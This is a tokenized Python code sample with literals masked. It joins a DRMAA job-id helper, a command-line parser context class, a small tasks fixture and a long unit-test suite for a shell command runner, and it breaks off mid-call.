<EOL> _BUFLEN ) != NO_MORE_ELEMENTS : <EOL> yield jid . value . decode ( ) <EOL> except : <EOL> drmaa_release_job_ids ( jids . contents ) <EOL> raise <EOL> else : <EOL> drmaa_release_job_ids ( jids . contents ) <EOL> def c ( f , * args ) : <EOL> """<STR_LIT>""" <EOL> return f ( * ( args + ( error_buffer , sizeof ( error_buffer ) ) ) ) <EOL> def string_vector ( v ) : <EOL> vlen = len ( v ) <EOL> values = ( STRING * ( vlen + <NUM_LIT:1> ) ) ( ) <EOL> for i , el in enumerate ( v ) : <EOL> values [ i ] = STRING ( el . encode ( ENCODING ) if isinstance ( el , str ) else el ) <EOL> values [ vlen ] = STRING ( ) <EOL> return values <EOL> def attribute_setter ( obj , attribute_name ) : <EOL> """<STR_LIT>""" <EOL> def f ( value ) : <EOL> "<STR_LIT>" % attribute_name <EOL> c ( drmaa_set_attribute , obj , attribute_name , value ) <EOL> f . __name__ = '<STR_LIT>' + attribute_name <EOL> return f <EOL> def attribute_getter ( obj , attribute_name ) : <EOL> """<STR_LIT>""" <EOL> def f ( ) : <EOL> "<STR_LIT>" % attribute_name <EOL> attr_buffer = create_string_buffer ( <NUM_LIT> ) <EOL> c ( drmaa_get_attribute , obj , attribute_name , attr_buffer , <EOL> sizeof ( attr_buffer ) ) <EOL> return attr_buffer . value <EOL> f . __name__ = '<STR_LIT>' + attribute_name <EOL> return f </s>
<s> import itertools <EOL> from . . vendor . lexicon import Lexicon <EOL> from . argument import Argument <EOL> def translate_underscores ( name ) : <EOL> return name . lstrip ( '<STR_LIT:_>' ) . rstrip ( '<STR_LIT:_>' ) . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> def to_flag ( name ) : <EOL> name = translate_underscores ( name ) <EOL> if len ( name ) == <NUM_LIT:1> : <EOL> return '<STR_LIT:->' + name <EOL> return '<STR_LIT>' + name <EOL> def sort_candidate ( arg ) : <EOL> names = arg . names <EOL> shorts = set ( x for x in names if len ( x . strip ( '<STR_LIT:->' ) ) == <NUM_LIT:1> ) <EOL> longs = set ( x for x in names if x not in shorts ) <EOL> return sorted ( shorts if shorts else longs ) [ <NUM_LIT:0> ] <EOL> def flag_key ( x ) : <EOL> """<STR_LIT>""" <EOL> ret = [ ] <EOL> x = sort_candidate ( x ) <EOL> ret . append ( <NUM_LIT:1> if len ( x ) == <NUM_LIT:1> else <NUM_LIT:0> ) <EOL> ret . append ( x . lower ( ) ) <EOL> inversed = '<STR_LIT>' <EOL> for char in x : <EOL> inversed += char . lower ( ) if char . isupper ( ) else char . upper ( ) <EOL> ret . append ( inversed ) <EOL> return ret <EOL> class ParserContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None , aliases = ( ) , args = ( ) ) : <EOL> """<STR_LIT>""" <EOL> self . args = Lexicon ( ) <EOL> self . positional_args = [ ] <EOL> self . flags = Lexicon ( ) <EOL> self . inverse_flags = { } <EOL> self . name = name <EOL> self . aliases = aliases <EOL> for arg in args : <EOL> self . add_arg ( arg ) <EOL> def __str__ ( self ) : <EOL> aliases = "<STR_LIT>" <EOL> if self . aliases : <EOL> aliases = "<STR_LIT>" . format ( '<STR_LIT:U+002CU+0020>' . join ( self . aliases ) ) <EOL> name = ( "<STR_LIT>" . format ( self . name , aliases ) ) if self . name else "<STR_LIT>" <EOL> args = ( "<STR_LIT>" . format ( self . args ) ) if self . args else "<STR_LIT>" <EOL> return "<STR_LIT>" . format ( name , args ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> def add_arg ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:1> and isinstance ( args [ <NUM_LIT:0> ] , Argument ) : <EOL> arg = args [ <NUM_LIT:0> ] <EOL> else : <EOL> arg = Argument ( * args , ** kwargs ) <EOL> for name in arg . names : <EOL> if name in self . args : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg . format ( name ) ) <EOL> main = arg . names [ <NUM_LIT:0> ] <EOL> self . args [ main ] = arg <EOL> if arg . positional : <EOL> self . positional_args . append ( arg ) <EOL> self . flags [ to_flag ( main ) ] = arg <EOL> for name in arg . nicknames : <EOL> self . args . alias ( name , to = main ) <EOL> self . flags . alias ( to_flag ( name ) , to = to_flag ( main ) ) <EOL> if arg . attr_name : <EOL> self . args . alias ( arg . attr_name , to = main ) <EOL> if arg . kind == bool and arg . default is True : <EOL> inverse_name = to_flag ( "<STR_LIT>" . format ( main ) ) <EOL> self . inverse_flags [ inverse_name ] = to_flag ( main ) <EOL> @ property <EOL> def needs_positional_arg ( self ) : <EOL> return any ( x . value is None for x in self . positional_args ) <EOL> @ property <EOL> def as_kwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> ret = { } <EOL> for arg in self . args . values ( ) : <EOL> ret [ arg . name ] = arg . value <EOL> return ret <EOL> def names_for ( self , flag ) : <EOL> return list ( set ( [ flag ] + self . flags . aliases_of ( flag ) ) ) <EOL> def help_for ( self , flag ) : <EOL> """<STR_LIT>""" <EOL> if flag not in self . flags : <EOL> err = "<STR_LIT>" <EOL> raise ValueError ( err . format ( flag , self . flags . keys ( ) ) ) <EOL> arg = self . flags [ flag ] <EOL> value = { <EOL> str : '<STR_LIT>' , <EOL> } . get ( arg . kind ) <EOL> full_names = [ ] <EOL> for name in self . names_for ( flag ) : <EOL> if value : <EOL> if len ( name . strip ( '<STR_LIT:->' ) ) == <NUM_LIT:1> : <EOL> value_ = ( "<STR_LIT>" . format ( value ) ) if arg . optional else value <EOL> valuestr = "<STR_LIT>" . format ( value_ ) <EOL> else : <EOL> valuestr = "<STR_LIT>" . format ( value ) <EOL> if arg . optional : <EOL> valuestr = "<STR_LIT>" . format ( valuestr ) <EOL> else : <EOL> if name in self . inverse_flags . values ( ) : <EOL> name = "<STR_LIT>" . format ( name [ <NUM_LIT:2> : ] ) <EOL> valuestr = "<STR_LIT>" <EOL> full_names . append ( name + valuestr ) <EOL> namestr = "<STR_LIT:U+002CU+0020>" . join ( sorted ( full_names , key = len ) ) <EOL> helpstr = arg . help or "<STR_LIT>" <EOL> return namestr , helpstr <EOL> def help_tuples ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( map ( <EOL> lambda x : self . help_for ( to_flag ( x . name ) ) , <EOL> sorted ( self . flags . values ( ) , key = flag_key ) <EOL> ) ) <EOL> def flag_names ( self ) : <EOL> """<STR_LIT>""" <EOL> flags = sorted ( self . flags . values ( ) , key = flag_key ) <EOL> names = [ self . names_for ( to_flag ( x . name ) ) for x in flags ] <EOL> names . append ( self . inverse_flags . keys ( ) ) <EOL> return tuple ( itertools . chain . from_iterable ( names ) ) </s>
<s> from invoke . tasks import task <EOL> @ task ( default = True ) <EOL> def foo ( ) : <EOL> pass <EOL> @ task ( default = True ) <EOL> def biz ( ) : <EOL> pass </s>
<s> import locale <EOL> import os <EOL> import sys <EOL> import types <EOL> from invoke . vendor . six import StringIO , b <EOL> from signal import SIGINT , SIGTERM <EOL> from spec import ( <EOL> Spec , trap , eq_ , skip , ok_ , raises , assert_contains , assert_not_contains <EOL> ) <EOL> from mock import patch , Mock , call <EOL> from invoke import Runner , Local , Context , Config , Failure , ThreadException <EOL> from invoke . platform import WINDOWS <EOL> from _util import mock_subprocess , mock_pty , skip_if_windows <EOL> _ = "<STR_LIT>" <EOL> class _Dummy ( Runner ) : <EOL> """<STR_LIT>""" <EOL> input_sleep = <NUM_LIT:0> <EOL> def start ( self , command , shell , env ) : <EOL> pass <EOL> def read_stdout ( self , num_bytes ) : <EOL> return "<STR_LIT>" <EOL> def read_stderr ( self , num_bytes ) : <EOL> return "<STR_LIT>" <EOL> def write_stdin ( self , data ) : <EOL> pass <EOL> def default_encoding ( self ) : <EOL> return "<STR_LIT>" <EOL> def wait ( self ) : <EOL> pass <EOL> def returncode ( self ) : <EOL> return <NUM_LIT:0> <EOL> def send_interrupt ( self ) : <EOL> pass <EOL> class _KeyboardInterruptingRunner ( _Dummy ) : <EOL> def wait ( self ) : <EOL> raise KeyboardInterrupt <EOL> class OhNoz ( Exception ) : <EOL> pass <EOL> def _expect_encoding ( codecs , encoding ) : <EOL> assert codecs . iterdecode . called <EOL> for c in codecs . iterdecode . call_args_list : <EOL> eq_ ( c [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , encoding ) <EOL> def _run ( * args , ** kwargs ) : <EOL> klass = kwargs . pop ( '<STR_LIT>' , _Dummy ) <EOL> settings = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> context = Context ( config = Config ( overrides = settings ) ) <EOL> return klass ( context ) . run ( * args , ** kwargs ) <EOL> def _runner ( out = '<STR_LIT>' , err = '<STR_LIT>' , ** kwargs ) : <EOL> klass = kwargs . pop ( '<STR_LIT>' , _Dummy ) <EOL> runner = klass ( Context ( config = Config ( overrides = kwargs ) ) ) <EOL> if '<STR_LIT>' in kwargs : <EOL> runner . returncode = Mock ( return_value = kwargs . pop ( '<STR_LIT>' ) ) <EOL> out_file = StringIO ( out ) <EOL> err_file = StringIO ( err ) <EOL> runner . read_stdout = out_file . read <EOL> runner . read_stderr = err_file . read <EOL> return runner <EOL> class Runner_ ( Spec ) : <EOL> def _run ( self , * args , ** kwargs ) : <EOL> return _run ( * args , ** kwargs ) <EOL> def _runner ( self , * args , ** kwargs ) : <EOL> return _runner ( * args , ** kwargs ) <EOL> def _mock_stdin_writer ( self ) : <EOL> """<STR_LIT>""" <EOL> class MockedStdin ( _Dummy ) : <EOL> pass <EOL> MockedStdin . write_stdin = Mock ( ) <EOL> return MockedStdin <EOL> class init : <EOL> "<STR_LIT>" <EOL> def takes_a_context_instance ( self ) : <EOL> c = Context ( ) <EOL> eq_ ( Runner ( c ) . context , c ) <EOL> @ raises ( TypeError ) <EOL> def context_instance_is_required ( self ) : <EOL> Runner ( ) <EOL> class warn : <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : True } , exits = <NUM_LIT:1> ) <EOL> runner . run ( _ ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : False } , exits = <NUM_LIT:1> ) <EOL> runner . run ( _ , warn = True ) <EOL> class hide : <EOL> @ trap <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT>' , run = { '<STR_LIT>' : True } ) <EOL> r = runner . run ( _ ) <EOL> eq_ ( r . stdout , '<STR_LIT>' ) <EOL> eq_ ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> @ trap <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT>' ) <EOL> r = runner . run ( _ , hide = True ) <EOL> eq_ ( r . stdout , '<STR_LIT>' ) <EOL> eq_ ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> class pty : <EOL> def pty_defaults_to_off ( self ) : <EOL> eq_ ( self . _run ( _ ) . pty , False ) <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : True } ) <EOL> eq_ ( runner . run ( _ ) . pty , True ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : False } ) <EOL> eq_ ( runner . run ( _ , pty = True ) . pty , True ) <EOL> class shell : <EOL> def defaults_to_bash_when_pty_True ( self ) : <EOL> eq_ ( self . _run ( _ , pty = True ) . shell , '<STR_LIT>' ) <EOL> def defaults_to_bash_when_pty_False ( self ) : <EOL> eq_ ( self . _run ( _ , pty = False ) . shell , '<STR_LIT>' ) <EOL> def may_be_overridden ( self ) : <EOL> eq_ ( self . _run ( _ , shell = '<STR_LIT>' ) . shell , '<STR_LIT>' ) <EOL> def may_be_configured ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> eq_ ( runner . run ( _ ) . shell , '<STR_LIT>' ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> eq_ ( runner . run ( _ , shell = '<STR_LIT>' ) . shell , '<STR_LIT>' ) <EOL> class env : <EOL> def defaults_to_os_environ ( self ) : <EOL> eq_ ( self . _run ( _ ) . env , os . environ ) <EOL> def updates_when_dict_given ( self ) : <EOL> expected = dict ( os . environ , FOO = '<STR_LIT>' ) <EOL> eq_ ( self . _run ( _ , env = { '<STR_LIT>' : '<STR_LIT>' } ) . env , expected ) <EOL> def replaces_when_replace_env_True ( self ) : <EOL> eq_ ( <EOL> self . _run ( _ , env = { '<STR_LIT>' : '<STR_LIT>' } , replace_env = True ) . env , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def config_can_be_used ( self ) : <EOL> eq_ ( <EOL> self . _run ( _ , settings = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } ) . env , <EOL> dict ( os . environ , FOO = '<STR_LIT>' ) , <EOL> ) <EOL> def kwarg_wins_over_config ( self ) : <EOL> settings = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } <EOL> kwarg = { '<STR_LIT>' : '<STR_LIT>' } <EOL> eq_ ( <EOL> self . _run ( _ , settings = settings , env = kwarg ) . env [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> class return_value : <EOL> def return_code_in_result ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = self . _runner ( exits = <NUM_LIT> ) <EOL> r = runner . run ( _ , warn = True ) <EOL> eq_ ( r . return_code , <NUM_LIT> ) <EOL> eq_ ( r . exited , <NUM_LIT> ) <EOL> def ok_attr_indicates_success ( self ) : <EOL> runner = self . _runner ( ) <EOL> eq_ ( runner . run ( _ ) . ok , True ) <EOL> def ok_attr_indicates_failure ( self ) : <EOL> runner = self . _runner ( exits = <NUM_LIT:1> ) <EOL> eq_ ( runner . run ( _ , warn = True ) . ok , False ) <EOL> def failed_attr_indicates_success ( self ) : <EOL> runner = self . _runner ( ) <EOL> eq_ ( runner . run ( _ ) . failed , False ) <EOL> def failed_attr_indicates_failure ( self ) : <EOL> runner = self . _runner ( exits = <NUM_LIT:1> ) <EOL> eq_ ( runner . run ( _ , warn = True ) . failed , True ) <EOL> @ trap <EOL> def stdout_attribute_contains_stdout ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT:foo>' ) <EOL> eq_ ( runner . run ( _ ) . stdout , "<STR_LIT:foo>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT:foo>" ) <EOL> @ trap <EOL> def stderr_attribute_contains_stderr ( self ) : <EOL> runner = self . _runner ( err = '<STR_LIT:foo>' ) <EOL> eq_ ( runner . run ( _ ) . stderr , "<STR_LIT:foo>" ) <EOL> eq_ ( sys . stderr . getvalue ( ) , "<STR_LIT:foo>" ) <EOL> def whether_pty_was_used ( self ) : <EOL> eq_ ( self . _run ( _ ) . pty , False ) <EOL> eq_ ( self . _run ( _ , pty = True ) . pty , True ) <EOL> def command_executed ( self ) : <EOL> eq_ ( self . _run ( _ ) . command , _ ) <EOL> def shell_used ( self ) : <EOL> eq_ ( self . _run ( _ ) . shell , '<STR_LIT>' ) <EOL> class command_echoing : <EOL> @ trap <EOL> def off_by_default ( self ) : <EOL> self . _run ( "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def enabled_via_kwarg ( self ) : <EOL> self . _run ( "<STR_LIT>" , echo = True ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def enabled_via_config ( self ) : <EOL> self . _run ( "<STR_LIT>" , settings = { '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def kwarg_beats_config ( self ) : <EOL> self . _run ( "<STR_LIT>" , echo = True , settings = { '<STR_LIT>' : { '<STR_LIT>' : False } } ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def uses_ansi_bold ( self ) : <EOL> self . _run ( "<STR_LIT>" , echo = True ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> class encoding : <EOL> def defaults_to_encoding_method_result ( self ) : <EOL> runner = self . _runner ( ) <EOL> encoding = '<STR_LIT>' <EOL> runner . default_encoding = Mock ( return_value = encoding ) <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> runner . run ( _ ) <EOL> runner . default_encoding . assert_called_with ( ) <EOL> _expect_encoding ( codecs , encoding ) <EOL> def honors_config ( self ) : <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> c = Context ( Config ( overrides = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) ) <EOL> _Dummy ( c ) . run ( _ ) <EOL> _expect_encoding ( codecs , '<STR_LIT>' ) <EOL> def honors_kwarg ( self ) : <EOL> skip ( ) <EOL> class output_hiding : <EOL> @ trap <EOL> def _expect_hidden ( self , hide , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT>" ) : <EOL> self . _runner ( out = '<STR_LIT:foo>' , err = '<STR_LIT:bar>' ) . run ( _ , hide = hide ) <EOL> eq_ ( sys . stdout . getvalue ( ) , expect_out ) <EOL> eq_ ( sys . stderr . getvalue ( ) , expect_err ) <EOL> def both_hides_everything ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' ) <EOL> def True_hides_everything ( self ) : <EOL> self . _expect_hidden ( True ) <EOL> def out_only_hides_stdout ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT:bar>" ) <EOL> def err_only_hides_stderr ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT>" ) <EOL> def accepts_stdout_alias_for_out ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT:bar>" ) <EOL> def accepts_stderr_alias_for_err ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT>" ) <EOL> def None_hides_nothing ( self ) : <EOL> self . _expect_hidden ( None , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT:bar>" ) <EOL> def False_hides_nothing ( self ) : <EOL> self . _expect_hidden ( False , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT:bar>" ) <EOL> @ raises ( ValueError ) <EOL> def unknown_vals_raises_ValueError ( self ) : <EOL> self . _run ( _ , hide = "<STR_LIT>" ) <EOL> def unknown_vals_mention_value_given_in_error ( self ) : <EOL> value = "<STR_LIT>" <EOL> try : <EOL> self . _run ( _ , hide = value ) <EOL> except ValueError as e : <EOL> msg = "<STR_LIT>" <EOL> msg += "<STR_LIT>" . format ( e ) <EOL> ok_ ( value in str ( e ) , msg ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> def does_not_affect_capturing ( self ) : <EOL> eq_ ( self . _runner ( out = '<STR_LIT:foo>' ) . run ( _ , hide = True ) . stdout , '<STR_LIT:foo>' ) <EOL> @ trap <EOL> def overrides_echoing ( self ) : <EOL> self . _runner ( ) . run ( '<STR_LIT>' , hide = True , echo = True ) <EOL> assert_not_contains ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> class output_stream_overrides : <EOL> @ trap <EOL> def out_defaults_to_sys_stdout ( self ) : <EOL> "<STR_LIT>" <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def err_defaults_to_sys_stderr ( self ) : <EOL> "<STR_LIT>" <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ ) <EOL> eq_ ( sys . stderr . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def out_can_be_overridden ( self ) : <EOL> "<STR_LIT>" <EOL> out = StringIO ( ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , out_stream = out ) <EOL> eq_ ( out . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def err_can_be_overridden ( self ) : <EOL> "<STR_LIT>" <EOL> err = StringIO ( ) <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ , err_stream = err ) <EOL> eq_ ( err . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stderr . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def pty_defaults_to_sys ( self ) : <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , pty = True ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def pty_out_can_be_overridden ( self ) : <EOL> out = StringIO ( ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , pty = True , out_stream = out ) <EOL> eq_ ( out . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> class output_stream_handling : <EOL> def writes_and_flushes_to_stdout ( self ) : <EOL> out = Mock ( spec = StringIO ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , out_stream = out ) <EOL> out . write . assert_called_once_with ( "<STR_LIT>" ) <EOL> out . flush . assert_called_once_with ( ) <EOL> def writes_and_flushes_to_stderr ( self ) : <EOL> err = Mock ( spec = StringIO ) <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ , err_stream = err ) <EOL> err . write . assert_called_once_with ( "<STR_LIT>" ) <EOL> err . flush . assert_called_once_with ( ) <EOL> class input_stream_handling : <EOL> @ patch ( '<STR_LIT>' , StringIO ( "<STR_LIT>" ) ) <EOL> def defaults_to_sys_stdin ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> self . _runner ( klass = klass ) . run ( _ , out_stream = StringIO ( ) ) <EOL> calls = list ( map ( lambda x : call ( b ( x ) ) , "<STR_LIT>" ) ) <EOL> klass . write_stdin . assert_has_calls ( calls , any_order = False ) <EOL> def can_be_overridden ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> in_stream = StringIO ( "<STR_LIT>" ) <EOL> self . _runner ( klass = klass ) . run ( <EOL> _ , <EOL> in_stream = in_stream , <EOL> out_stream = StringIO ( ) , <EOL> ) <EOL> calls = list ( map ( lambda x : call ( b ( x ) ) , "<STR_LIT>" ) ) <EOL> klass . write_stdin . assert_has_calls ( calls , any_order = False ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def exceptions_get_logged ( self , mock_debug ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> klass . write_stdin . side_effect = OhNoz ( "<STR_LIT>" ) <EOL> try : <EOL> stdin = StringIO ( "<STR_LIT>" ) <EOL> self . _runner ( klass = klass ) . run ( _ , in_stream = stdin ) <EOL> except ThreadException : <EOL> pass <EOL> mock_debug . assert_called_with ( "<STR_LIT>" ) <EOL> class failure_handling : <EOL> @ raises ( Failure ) <EOL> def fast_failures ( self ) : <EOL> self . _runner ( exits = <NUM_LIT:1> ) . run ( _ ) <EOL> def non_one_return_codes_still_act_as_failure ( self ) : <EOL> r = self . _runner ( exits = <NUM_LIT> ) . run ( _ , warn = True ) <EOL> eq_ ( r . failed , True ) <EOL> def Failure_repr_includes_stderr ( self ) : <EOL> try : <EOL> self . _runner ( exits = <NUM_LIT:1> , err = "<STR_LIT>" ) . run ( _ , hide = True ) <EOL> assert false <EOL> except Failure as f : <EOL> r = repr ( f ) <EOL> err = "<STR_LIT>" . format ( r ) <EOL> assert '<STR_LIT>' in r , err <EOL> def Failure_repr_should_present_stdout_when_pty_was_used ( self ) : <EOL> try : <EOL> self . _runner ( exits = <NUM_LIT:1> , out = "<STR_LIT>" ) . run ( _ , hide = True , pty = True ) <EOL> assert false <EOL> except Failure as f : <EOL> r = repr ( f ) <EOL> err = "<STR_LIT>" . format ( r ) <EOL> assert '<STR_LIT>' in r , err <EOL> class threading : <EOL> def errors_within_io_thread_body_bubble_up ( self ) : <EOL> class Oops ( _Dummy ) : <EOL> def handle_stdout ( self , ** kwargs ) : <EOL> raise OhNoz ( ) <EOL> def handle_stderr ( self , ** kwargs ) : <EOL> raise OhNoz ( ) <EOL> runner = Oops ( Context ( ) ) <EOL> try : <EOL> runner . run ( "<STR_LIT>" ) <EOL> except ThreadException as e : <EOL> eq_ ( len ( e . exceptions ) , <NUM_LIT:2> ) <EOL> for tup in e . exceptions : <EOL> ok_ ( isinstance ( tup . value , OhNoz ) ) <EOL> ok_ ( isinstance ( tup . traceback , types . TracebackType ) ) <EOL> eq_ ( tup . type , OhNoz ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> class responding : <EOL> def nothing_is_written_to_stdin_by_default ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> self . _runner ( klass = klass ) . run ( _ ) <EOL> ok_ ( not klass . write_stdin . called ) <EOL> def _expect_response ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> klass = self . _mock_stdin_writer ( ) <EOL> kwargs [ '<STR_LIT>' ] = klass <EOL> runner = self . _runner ( ** kwargs ) <EOL> runner . run ( _ , responses = kwargs [ '<STR_LIT>' ] , hide = True ) <EOL> return klass . write_stdin <EOL> def string_keys_in_responses_kwarg_yield_values_as_stdin_writes ( self ) : <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( "<STR_LIT>" ) ) <EOL> def regex_keys_also_work ( self ) : <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { r'<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( '<STR_LIT>' ) ) <EOL> def multiple_hits_yields_multiple_responses ( self ) : <EOL> holla = call ( b ( '<STR_LIT>' ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_has_calls ( [ holla , holla ] ) <EOL> def chunk_sizes_smaller_than_patterns_still_work_ok ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> klass . read_chunk_size = <NUM_LIT:1> <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } <EOL> runner = self . _runner ( klass = klass , out = "<STR_LIT>" ) <EOL> runner . run ( _ , responses = responses , hide = True ) <EOL> holla = call ( b ( '<STR_LIT>' ) ) <EOL> klass . write_stdin . assert_has_calls ( [ holla , holla ] ) <EOL> eq_ ( len ( klass . write_stdin . call_args_list ) , <NUM_LIT:2> ) <EOL> def patterns_span_multiple_lines ( self ) : <EOL> output = """<STR_LIT>""" <EOL> self . _expect_response ( <EOL> out = output , <EOL> responses = { r'<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( '<STR_LIT>' ) ) <EOL> def both_out_and_err_are_scanned ( self ) : <EOL> bye = call ( b ( "<STR_LIT>" ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> err = "<STR_LIT>" , <EOL> responses = { "<STR_LIT:hello>" : "<STR_LIT>" } , <EOL> ) . assert_has_calls ( [ bye , bye ] ) <EOL> def multiple_patterns_works_as_expected ( self ) : <EOL> calls = [ call ( b ( '<STR_LIT>' ) ) , call ( b ( '<STR_LIT>' ) ) ] <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_has_calls ( calls , any_order = True ) <EOL> def multiple_patterns_across_both_streams ( self ) : <EOL> responses = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> calls = map ( lambda x : call ( b ( x ) ) , responses . values ( ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> err = "<STR_LIT>" , <EOL> responses = responses , <EOL> ) . assert_has_calls ( calls , any_order = True ) <EOL> class io_sleeping : <EOL> def input_sleep_attribute_defaults_to_hundredth_of_second ( self ) : <EOL> eq_ ( Runner ( Context ( ) ) . input_sleep , <NUM_LIT> ) <EOL> @ mock_subprocess ( ) <EOL> def subclasses_can_override_input_sleep ( self ) : <EOL> class MyRunner ( _Dummy ) : <EOL> input_sleep = <NUM_LIT> <EOL> with patch ( '<STR_LIT>' ) as mock_time : <EOL> MyRunner ( Context ( ) ) . run ( <EOL> _ , <EOL> in_stream = StringIO ( "<STR_LIT:foo>" ) , <EOL> out_stream = StringIO ( ) , <EOL> ) <EOL> eq_ ( mock_time . sleep . call_args_list , [ call ( <NUM_LIT> ) ] * <NUM_LIT:3> ) <EOL> class stdin_mirroring : <EOL> def _test_mirroring ( <EOL> self , <EOL> expect_mirroring , <EOL> ** kwargs <EOL> ) : <EOL> fake_in = "<STR_LIT>" <EOL> output = Mock ( ) <EOL> input_ = StringIO ( fake_in ) <EOL> input_is_pty = kwargs . pop ( '<STR_LIT>' , None ) <EOL> class MyRunner ( _Dummy ) : <EOL> def echo_stdin ( self , input_ , output ) : <EOL> if input_is_pty is not None : <EOL> input_ . isatty = lambda : input_is_pty <EOL> return super ( MyRunner , self ) . echo_stdin ( input_ , output ) <EOL> self . _run ( <EOL> _ , <EOL> klass = MyRunner , <EOL> in_stream = input_ , <EOL> out_stream = output , <EOL> ** 